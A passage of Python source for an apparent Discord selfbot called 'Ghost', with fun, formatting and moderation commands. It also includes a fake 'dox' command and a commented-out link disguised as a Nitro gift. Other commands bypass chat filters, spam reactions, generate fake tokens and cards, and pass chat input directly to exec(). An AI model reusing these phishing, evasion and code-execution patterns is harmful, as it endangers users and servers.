e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
e.set_thumbnail(url=__embedimage__)
e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
e.timestamp = datetime.now()
await ctx.send(embed=e)
except:
pass
else:
e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
e.set_thumbnail(url=__embedimage__)
e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
e.timestamp = datetime.now()
await ctx.send(embed=e)
@Ghost.command(name="8ball", description="Ask the magic eight ball a question.", usage="8ball [question]", aliases=["eightball", "magic8ball"])
async def eightball(ctx, *, question):
choices = ["As I see it, yes.", "Ask again later.", "Better not tell you now.", "Cannot predict now.", "Concentrate and ask again.", "Don’t count on it.", "It is certain.", "It is decidedly so.", "Most likely.", "My reply is no.", "My sources say no.", "Outlook not so good.", "Outlook good.", "Reply hazy, try again.", "Signs point to yes.", "Very doubtful.", "Without a doubt.", "Yes.", "Yes – definitely.", "You may rely on it."]
choice = random.choice(choices)
choice = "8ball says, " + choice
if __embedmode__:
embed = discord.Embed(title=f"{question}", description=choice, color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(question + "\n" + choice)
@Ghost.command(name="choice", description="Pick a random choice.", usage="choice [choice1] [choice2]", aliases=["pick", "decide"])
async def choice(ctx, choice1, choice2):
choices = [choice1, choice2]
choice = random.choice(choices)
if __embedmode__:
embed = discord.Embed(title=f"{choice}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(choice)
@Ghost.command(name="range", description="Pick a random number between two.", usage="random [number1] [number2]", aliases=["rangenumber", "pickrannumber"])
async def choice(ctx, arg1, arg2):
finalnumber = random.randint(int(arg1),int(arg2))
if __embedmode__:
embed = discord.Embed(title=f"{finalnumber}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(finalnumber)
# @Ghost.command(name="wyr", description="Would you rather questions.", usage="wyr")
# async def wyr_(ctx):
# question, _ = wyr()
# embed = discord.Embed(title="Would You Rather", description=question, color=__embedcolour__)
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(embed=embed)
# # await message.add_reaction("\U0001F7E6")
# # await message.add_reaction("\U0001F7E5")
@Ghost.command(name="dox", description="Dox the mentioned user.", usage="dox [@user]", aliases=["fakedox"])
async def dox(ctx, *, user: discord.User):
randint1 = random.randint(100, 270)
randint2 = random.randint(100, 270)
randint3 = random.randint(10, 40)
randint4 = random.randint(100, 270)
countries = ["Afghanistan","Albania","Algeria","Andorra","Angola","Anguilla","Argentina","Armenia","Aruba","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bermuda","Bhutan","Bolivia","Bosnia & Herzegovina","Botswana","Brazil","British Virgin Islands","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Cape Verde","Cayman Islands","Chad","Chile","China","Colombia","Congo","Cook Islands","Costa Rica","Cote D Ivoire","Croatia","Cruise Ship","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","Ecuador","Egypt","El Salvador","Equatorial Guinea","Estonia","Ethiopia","Falkland Islands","Faroe Islands","Fiji","Finland","France","French Polynesia","French West Indies","Gabon","Gambia","Georgia","Germany","Ghana","Gibraltar","Greece","Greenland","Grenada","Guam","Guatemala","Guernsey","Guinea","Guinea Bissau","Guyana","Haiti","Honduras","Hong Kong","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Isle of Man","Israel","Italy","Jamaica","Japan","Jersey","Jordan","Kazakhstan","Kenya","Kuwait","Kyrgyz Republic","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macau","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Mauritania","Mauritius","Mexico","Moldova","Monaco","Mongolia","Montenegro","Montserrat","Morocco","Mozambique","Namibia","Nepal","Netherlands","Netherlands Antilles","New Caledonia","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palestine","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Puerto Rico","Qatar","Reunion","Romania","Russia","Rwanda","Saint Pierre & Miquelon","Samoa","San Marino","Saudi Arabia","Senegal","Serbia","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","South Africa","South Korea","Spain","Sri Lanka","St Kitts & Nevis","St Lucia","St Vincent","St. Lucia","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Timor L'Este","Togo","Tonga","Trinidad & Tobago","Tunisia","Turkey","Turkmenistan","Turks & Caicos","Uganda","Ukraine","United Arab Emirates","United Kingdom","Uruguay","Uzbekistan","Venezuela","Vietnam","Virgin Islands (US)","Yemen","Zambia","Zimbabwe","Reddit Isle"]
computer = ['Windows', 'Mac', 'Linux', 'IOS', 'Android', 'Unknown', 'TempleOS', 'Archbtw']
if __embedmode__:
embed = discord.Embed(title=f"Doxxed {user.name}", color=__embedcolour__)
embed.add_field(name="IP Address", value=f"```{randint1}.{randint2}.{randint3}.{randint4}```")
embed.add_field(name="Country", value="```" + random.choice(countries) + "```")
embed.add_field(name="Computer", value="```" + random.choice(computer) + "```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"Doxxed {user.name}\nIP Address: {randint1}.{randint2}.{randint3}.{randint4}\nCountry: " + random.choice(countries) + "\nComputer: " + random.choice(computer))
# @Ghost.command(name="fakenitro", description="Hide a link in a nitro URL.", usage="fakenitro [url]")
# async def fakenitro(ctx, *, url):
# code = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(16))
# nitro = "https://discord.gift/" + code
# if __embedmode__:
# embed = discord.Embed(title=f"Nitro", color=__embedcolour__, description=f"[{nitro}]({url})")
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(embed=embed)
# else:
# await ctx.send("This command can only be used in embed mode.")
@Ghost.command(name="nitrogen", description="Generate a nitro code.", usage="nitrogen", aliases=["nitrogenerate", "generatenitro", "gennitro"])
async def nitrogen(ctx):
code = ''.join(random.choice(string.ascii_letters + string.digits ) for i in range(19))
nitro = "https://discord.gift/" + code
if __embedmode__:
embed = discord.Embed(title=f"Nitro", color=__embedcolour__, description=f"{nitro}")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(nitro)
@Ghost.command(name="tokengen", description="Generate a discord user token.", usage="tokengen", aliases=["generatetoken", "tokengenerate", "gentoken"])
async def tokengen(ctx):
authorId = str(ctx.author.id)
message_bytes = authorId.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
token1 = base64_bytes.decode('ascii')
token2 = ''.join(random.choice(string.ascii_letters + string.digits ) for i in range(6))
token3 = ''.join(random.choice(string.ascii_letters + string.digits ) for i in range(27))
token = f"{token1}.{token2}.{token3}"
if __embedmode__:
embed = discord.Embed(title=f"Token Generator", color=__embedcolour__, description=f"{token}")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(token)
@Ghost.command(name="eval", description="Very scary, summoned amogus in my house. Log4J in a nutshell :flushed:", usage="eval [scary code]", aliases=["evaluate"])
async def eval(ctx, *, arg):
exec(arg)
@Ghost.command(name="identitygen", description="Generate a fake identity.", usage="identitygen", aliases=["identitygenerate", "generateidentity", "genidentity", "idgen", "genid"])
async def identitygen(ctx):
firstname = fake.first_name()
lastname = fake.last_name()
address = fake.address()
job = fake.job()
phone = fake.phone_number()
emails = ["gmail.com", "yahoo.com", "yahoo.co.uk"]
emailchoice = random.choice(emails)
email = f"{firstname}.{lastname}@{emailchoice}"
birthdate = fake.date_of_birth()
genderchoices = ["Male", "Female"]
gender = random.choice(genderchoices)
if __embedmode__:
embed = discord.Embed(title=f"Identity Generator", color=__embedcolour__)
embed.add_field(name="Full Name", value=f"{firstname} {lastname}", inline=True)
embed.add_field(name="Email", value=f"{email}", inline=True)
embed.add_field(name="Phone Number", value=f"{phone}", inline=True)
embed.add_field(name="Occupation", value=f"{job}", inline=True)
embed.add_field(name="Birthdate", value=f"{birthdate}", inline=True)
embed.add_field(name="Gender", value=f"{gender}", inline=True)
embed.add_field(name="Address", value=f"{address}", inline=True)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Identity Generator ]
Full Name: {firstname} {lastname}
Email: {email}
Phone Number: {phone}
Occupation: {job}
Birthdate: {birthdate}
Gender: {gender}
Address: {address}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="passwordgen", description="Generate a secure password.", usage="passwordgen [length]", aliases=["passwordgenerate", "generatepassword", "genpassword"])
async def passwordgen(ctx, length: int):
password = ''.join(random.choice(string.ascii_letters) for i in range(length))
if __embedmode__:
embed = discord.Embed(title="Password Generator", color=__embedcolour__, description=f"Your generated password is ||{password}||")
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"Password: ||{password}||")
@Ghost.command(name="ccgen", description="Generate a fake Credit card.", usage="ccgen", aliases=["creditcardgenerate", "creditcardgen", "generatecc", "ccgenerate", "gencreditcard", "generatecreditcard"])
async def ccgen(ctx):
name = names.get_full_name()
address = fake.address()
cvv = random.randint(100, 999)
expiremonth = random.randint(1, 12)
expireyear = now.year + random.randint(1, 4)
choices = [4,5,6]
choice = random.choice(choices)
if choice == 4:
type = "Visa"
typeimg = "https://ghost.cool/assets/visa.png"
elif choice == 5:
type = "Mastercard"
typeimg = "https://ghost.cool/assets/mastercard.png"
elif choice == 6:
type = "Discover"
typeimg = "https://ghost.cool/assets/discover.png"
string1 = random.randint(100, 999)
string2 = random.randint(1000, 9999)
string3 = random.randint(1000, 9999)
string4 = random.randint(1000, 9999)
if __embedmode__:
embed = discord.Embed(title="Credit Card Generator", color=__embedcolour__)
embed.add_field(name="Number", value=f"{choice}{string1} {string2} {string3} {string4}", inline=True)
embed.add_field(name="Name", value=f"{name}", inline=True)
embed.add_field(name="CVV", value=f"{cvv}", inline=True)
embed.add_field(name="Expire Date", value=f"{expiremonth}/{expireyear}", inline=True)
embed.add_field(name="Type", value=f"{type}", inline=True)
embed.add_field(name="Address", value=f"{address}", inline=True)
embed.set_thumbnail(url=typeimg)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Credit Card Generator ]
Number: {choice}{string1} {string2} {string3} {string4}
Name: {name}
CVV: {cvv}
Expire Date: {expiremonth}/{expireyear}
Type: {type}
Address: {address}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
# @Ghost.command(name="cembed", description="Create a custom embedded message.", usage='cembed [title] [description] [colour]', aliases=["customembed"])
# async def cembed(ctx, title, description, colour):
# if __embedmode__:
# colour = int(colour.replace('#', '0x'), 0)
# embed = discord.Embed(title=title, description=description, color=colour)
# await ctx.send(embed=embed)
# else:
# await ctx.send("This command can only be used in embed mode.")
# @Ghost.command(name="embed", description="Create an embedded message.", usage="embed [title]")
# async def embed(ctx, *, title):
# if __embedmode__:
# embed = discord.Embed(title=title, color=__embedcolour__)
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(embed=embed)
# else:
# await ctx.send("This command can only be used in embed mode.")
@Ghost.command(name="leet", description="Turn your text into 1337 text.", usage="leet [text]", aliases=["1337", "leetspeak"])
async def leet(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/leet?text={text}").text)
@Ghost.command(name="zalgo", description="Unleash the zalgo into your message.", usage="zalgo [text]")
async def zalgo(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"http://timbw.ddns.net:5000/zalgo?text={text}").text)
@Ghost.command(name="upsidedown", description="Flip your text upsidedown.", usage="upsidedown [text]")
async def upsidedown(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/upsidedown?text={text}").text)
@Ghost.command(name="reverse", description="Reverse your text making them look backwards.", usage="reverse [text]", aliases=["backwards"])
async def reverse(ctx, *, text):
await ctx.send(''.join(list(reversed(text))))
@Ghost.command(name="ascii", description="Send your message in ascii.", usage="ascii [text]")
async def ascii(ctx, *, text):
message = text
art = requests.get(f'http://artii.herokuapp.com/make?text={urllib.parse.quote_plus(message)}+&font=standard').text
await ctx.send(f"```{art}```")
@Ghost.command(name="privatemsg", description="Send an encrypted message.", usage="privatemsg [message]", aliases=["b64encode", "privatemessage"])
async def privatemsg(ctx, *, message):
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
await ctx.send(base64_message)
@Ghost.command(name="privatemsgdecode", description="Decode an encrypted message.", usage="privatemsgdecode [message]", aliases=["b64decode", "privatemessagedecode"])
async def privatemsgdecode(ctx, *, message):
base64_message = message
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
await ctx.send(message)
@Ghost.command(name="encodebinary", description="Encode a message in binary.", usage="encodebinary [message]", aliases=["binaryencode", "binary"])
async def encodebinary(ctx, *, message):
translation = ""
@Ghost.command(name="decodebinary", description="Decode a message in binary.", usage="decodebinary [message]", aliases=["binarydecode", "unbinary"])
async def decodebinary(ctx, *, message):
translation = ""
@Ghost.command(name="encodemorse", description="Encode a message in morsecode", usage="encodemorse [message]", aliases=["morseencode", "morse"])
async def encodemorse(ctx, *, message):
text = message.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/encodemorse?text={text}").text)
@Ghost.command(name="decodemorse", description="Decode a message in morsecode", usage="decodemorse [message]", aliases=["morsedecode", "unmorse"])
async def decodemorse(ctx, *, message):
text = message.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/decodemorse?text={text}").text)
@Ghost.command(name="secret", description="Send all your messages in a secret block.", usage="secret [message]")
async def secret(ctx, *, message):
await ctx.send('||' + message + '||')
@Ghost.command(name="secretletters", description="Put all lettes from your message into separate secret blocks", usage="secretletters [message]")
async def secretletters(ctx, *, message):
def split(word):
return list(word)
msg = ""
for letter in split(message):
msg += "||" + letter + "||"
await ctx.send(msg)
@Ghost.command(name="bold", description="Send all your messages in bold.", usage="bold [message]")
async def bold(ctx, *, message):
await ctx.send('**' + message + '**')
@Ghost.command(name="italic", description="Send all your messages in italics.", usage="italic [message]")
async def italic(ctx, *, message):
await ctx.send('*' + message + '*')
@Ghost.command(name="cpp", description="Send all your messages in a C++ code block.", usage="cpp [message]")
async def cpp(ctx, *, message):
await ctx.send(f"""```cpp\n{message}```""")
@Ghost.command(name="cs", description="Send all your messages in a C Sharp code block.", usage="cs [message]")
async def cs(ctx, *, message):
await ctx.send(f"""```cs\n{message}```""")
@Ghost.command(name="java", description="Send all your messages in a Java code block.", usage="java [message]")
async def java(ctx, *, message):
await ctx.send(f"""```java\n{message}```""")
@Ghost.command(name="python", description="Send all your messages in a Python code block.", usage="python [message]")
async def python(ctx, *, message):
await ctx.send(f"""```py\n{message}```""")
@Ghost.command(name="js", description="Send all your messages in a JavaScript code block.", usage="js [message]")
async def js(ctx, *, message):
await ctx.send(f"""```js\n{message}```""")
@Ghost.command(name="lua", description="Send all your messages in a Lua code block.", usage="lua [message]")
async def lua(ctx, *, message):
await ctx.send(f"""```lua\n{message}```""")
@Ghost.command(name="php", description="Send all your messages in a PHP code block.", usage="php [message]")
async def php(ctx, *, message):
await ctx.send(f"""```php\n{message}```""")
@Ghost.command(name="html", description="Send all your messages in a HTML code block.", usage="html [message]")
async def html(ctx, *, message):
await ctx.send(f"""```html\n{message}```""")
@Ghost.command(name="css", description="Send all your messages in a CSS code block.", usage="css [message]")
async def css(ctx, *, message):
await ctx.send(f"""```css\n{message}```""")
@Ghost.command(name="yaml", description="Send all your messages in a YAML code block.", usage="yaml [message]")
async def yaml(ctx, *, message):
await ctx.send(f"""```yaml\n{message}```""")
@Ghost.command(name="json", description="Send all your messages in a JSON code block.", usage="json [message]")
async def _json(ctx, *, message):
await ctx.send(f"""```json\n{message}```""")
@Ghost.command(name="aesthetic", description="Send your text s p a c e d out.", usage="aesthetic [text]")
async def aesthetic(ctx, *, text):
message = text
msg = ""
for letter in list(message):
msg += " " + letter + " "
await ctx.send(msg)
@Ghost.command(name="animate", description="Animate your text.", usage="animate [text]")
async def animate(ctx, *, text):
output = ""
text = list(text)
msg = await ctx.send(text[0])
for letter in text:
output = output + letter + ""
await msg.edit(content=output)
await asyncio.sleep(1)
@Ghost.command(name="chatbypass", description="Bypass chat language restrictions.", usage="chatbypass [text]", aliases=["bypasschat"])
async def chatbypass(ctx, *, text):
text = text.lower()
regional_indicators = {
'a': '𝚊',
'b': '𝚋',
'c': '𝚌',
'd': '𝚍',
'e': '𝚎',
'f': '𝚏',
'g': '𝚐',
'h': '𝚑',
'i': '𝚒',
'j': '𝚓',
'k': '𝚔',
'l': '𝚕',
'm': '𝚖',
'n': '𝚗',
'o': '𝚘',
'p': '𝚙',
'q': '𝚚',
'r': '𝚛',
's': '𝚜',
't': '𝚝',
'u': '𝚞',
'v': '𝚟',
'w': '𝚠',
'x': '𝚡',
'y': '𝚢',
'z': '𝚣'
}
output = ""
text = list(text)
for letter in text:
if letter in regional_indicators:
output = output + regional_indicators[letter] + ""
else:
output = output + letter
await ctx.send(output)
@Ghost.command(name="regional", description="Replace all letters with emoji.", usage="regional [text]", aliases=["emojireplace", "change2emoji"])
async def regional(ctx, *, text):
text = text.lower()
regional_indicators = {
'a': '<:regional_indicator_a:803940414524620800>',
'b': '<:regional_indicator_b:803940414524620800>',
'c': '<:regional_indicator_c:803940414524620800>',
'd': '<:regional_indicator_d:803940414524620800>',
'e': '<:regional_indicator_e:803940414524620800>',
'f': '<:regional_indicator_f:803940414524620800>',
'g': '<:regional_indicator_g:803940414524620800>',
'h': '<:regional_indicator_h:803940414524620800>',
'i': '<:regional_indicator_i:803940414524620800>',
'j': '<:regional_indicator_j:803940414524620800>',
'k': '<:regional_indicator_k:803940414524620800>',
'l': '<:regional_indicator_l:803940414524620800>',
'm': '<:regional_indicator_m:803940414524620800>',
'n': '<:regional_indicator_n:803940414524620800>',
'o': '<:regional_indicator_o:803940414524620800>',
'p': '<:regional_indicator_p:803940414524620800>',
'q': '<:regional_indicator_q:803940414524620800>',
'r': '<:regional_indicator_r:803940414524620800>',
's': '<:regional_indicator_s:803940414524620800>',
't': '<:regional_indicator_t:803940414524620800>',
'u': '<:regional_indicator_u:803940414524620800>',
'v': '<:regional_indicator_v:803940414524620800>',
'w': '<:regional_indicator_w:803940414524620800>',
'x': '<:regional_indicator_x:803940414524620800>',
'y': '<:regional_indicator_y:803940414524620800>',
'z': '<:regional_indicator_z:803940414524620800>'
}
output = ""
text = list(text)
for letter in text:
if letter in regional_indicators:
output = output + regional_indicators[letter] + " "
else:
output = output + letter
await ctx.send(output)
@Ghost.command(name="reactspam", description="Spam reactions on X amount of messages.", usage="reactspam [emoji] [messages]", aliases=["spamreactions", "spamreact"])
async def reactspam(ctx, emoji, messages: int):
if __riskmode__:
#channel = Ghost.get_channel(ctx.channel.id)
msgs = await ctx.channel.history(limit=messages).flatten()
for msg in msgs:
try:
await msg.add_reaction(emoji)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="uppercase", description="Send your message in uppercase.", usage="uppercase [msg]")
async def uppercase(ctx, *, msg):
string = msg.upper()
await ctx.send(string)
@Ghost.command(name="lowercase", description="Send your message in lowercase.", usage="lowercase [msg]")
async def lowercase(ctx, *, msg):
string = msg.lower()
await ctx.send(string)
@Ghost.command(name="sentencecase", description="Send your messages in sentence case.", usage="sentencecase [msg]")
async def sentencecase(ctx, *, msg):
sentenceList = msg.split(". ")
sentenceList2 = []
for string in sentenceList:
string = string[:1].upper() + string[1:]
sentenceList2.append(string)
sentence = ". ".join(sentenceList2)
await ctx.send(sentence)
@Ghost.command(name="banlist", description="See the server's ban list.", usage="banlist")
async def banlist(ctx):
if ctx.author.guild_permissions.manage_guild:
msg = ""
banlist = await ctx.guild.bans()
for ban in banlist:
#username = user[0].name
msg += f"{ban.user.name}#{ban.user.discriminator} ({ban.user.id})\n"
if __embedmode__:
embed = discord.Embed(title=ctx.guild.name + "'s banned member list", description=msg, color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {ctx.guild.name}'s banned member list ]
{msg}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="ban", description="Ban the mentioned user.", usage="ban [@user]")
async def ban(ctx, *, user: discord.Member):
if ctx.author.guild_permissions.ban_members:
await user.ban()
if __embedmode__:
embed = discord.Embed(title=user.name + " has been banned", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been banned")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="unban", description="Unban the mentioned id.", usage="unban [id]")
async def unban(ctx, *, id: int):
if ctx.author.guild_permissions.ban_members:
user = await Ghost.fetch_user(id)
await ctx.guild.unban(user)
if __embedmode__:
embed = discord.Embed(title=user.name + " has been unbanned", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been unbanned")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="kick", description="Kick the mentioned user.", usage="kick [@user]")
async def kick(ctx, user: discord.Member):
if ctx.author.guild_permissions.kick_members:
await user.kick()
if __embedmode__:
embed = discord.Embed(title=user.name + " has been kicked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been kicked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="mute", description="Mute the menitioned user.", usage="mute [@user]")
async def mute(ctx, user: discord.Member):
if ctx.author.guild_permissions.mute_members:
if get(ctx.guild.roles, name="Muted"):
mutedrole = get(ctx.guild.roles, name="Muted")
else:
await ctx.guild.create_role(name="Muted")
mutedrole = get(ctx.guild.roles, name="Muted")
for channel in ctx.guild.channels:
if channel.type == "Text":
await channel.set_permissions(mutedrole, send_messages=False)
else:
await channel.set_permissions(mutedrole, send_messages=False, connect=False)
await user.add_roles(mutedrole)
if __embedmode__:
embed = discord.Embed(title=user.name + " has been muted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been muted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="unmute", description="Unmute the mentioned user.", usage="unmute [@user]")
async def unmute(ctx, user: discord.Member):
if ctx.author.guild_permissions.mute_members:
mutedrole = get(ctx.guild.roles, name="Muted")
if mutedrole in user.roles:
if __embedmode__:
await user.remove_roles(mutedrole)
embed = discord.Embed(title=user.name + " has been unmuted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been unmuted")
else:
if __embedmode__:
embed = discord.Embed(title=user.name + " is not muted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} is not muted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="newrole", description="Create a new role.", usage="newrole [name]", aliases=["createrole"])
async def newrole(ctx, *, name):
if ctx.author.guild_permissions.manage_roles:
await ctx.guild.create_role(name=name)
if __embedmode__:
embed = discord.Embed(title="@" + name + " has been created", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"@{name} has been created")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="delrole", description="Delete the mentioned role.", usage="delrole [@role]", aliases=["deleterole"])
async def delrole(ctx, *, role: discord.Role):
if ctx.author.guild_permissions.manage_roles:
await role.delete()
if __embedmode__:
embed = discord.Embed(title="@" + role.name + " has been deleted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"@{role.name} has been deleted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="purge", description="Purge X amount of messages.", usage="purge [amount]")
async def purge(ctx, amount: int):
if ctx.author.guild_permissions.manage_messages:
history = await ctx.channel.history(limit=amount).flatten()
deletedamount = 0
for message in history:
try:
deletedamount+=1
await message.delete()
await asyncio.sleep(1)
except:
pass
if __embedmode__:
embed = discord.Embed(title=f"Deleted {deletedamount} messages", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
